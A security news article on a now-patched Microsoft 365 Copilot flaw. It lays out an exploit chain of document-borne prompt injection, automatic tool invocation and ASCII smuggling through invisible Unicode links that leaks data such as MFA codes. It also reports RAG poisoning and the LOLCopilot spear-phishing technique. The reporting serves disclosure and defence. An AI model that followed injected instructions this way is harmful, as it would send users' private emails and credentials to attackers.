Details have emerged about a now-patched vulnerability in Microsoft 365 Copilot that could enable the theft of sensitive user information using a technique called ASCII smuggling.
"ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface," security researcher Johann Rehberger said.
"This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!"
The entire attack strings together a number of attack methods to fashion them into a reliable exploit chain. This includes the following steps -
- Trigger prompt injection via malicious content concealed in a document shared on the chat to seize control of the chatbot
- Using a prompt injection payload to instruct Copilot to search for more emails and documents, a technique called automatic tool invocation
- Leveraging ASCII smuggling to entice the user into clicking on a link to exfiltrate valuable data to a third-party server
The net outcome of the attack is that sensitive data present in emails, including multi-factor authentication (MFA) codes, could be transmitted to an adversary-controlled server. Microsoft has since addressed the issues following responsible disclosure in January 2024.
The development comes as proof-of-concept (PoC) attacks have been demonstrated against Microsoft's Copilot system to manipulate responses, exfiltrate private data, and dodge security protections, once again highlighting the need for monitoring risks in artificial intelligence (AI) tools.
The methods, detailed by Zenity, allow malicious actors to perform retrieval-augmented generation (RAG) poisoning and indirect prompt injection leading to remote code execution attacks that can fully control Microsoft Copilot and other AI apps. In a hypothetical attack scenario, an external hacker with code execution capabilities could trick Copilot into providing users with phishing pages.
Perhaps one of the most novel attacks is the ability to turn the AI into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim's email account to send phishing messages mimicking the compromised users' style.
Microsoft has also acknowledged that publicly exposed Copilot bots created using Microsoft Copilot Studio and lacking any authentication protections could be an avenue for threat actors to extract sensitive information, assuming they have prior knowledge of the Copilot name or URL.
"Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents), and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots," Rehberger said.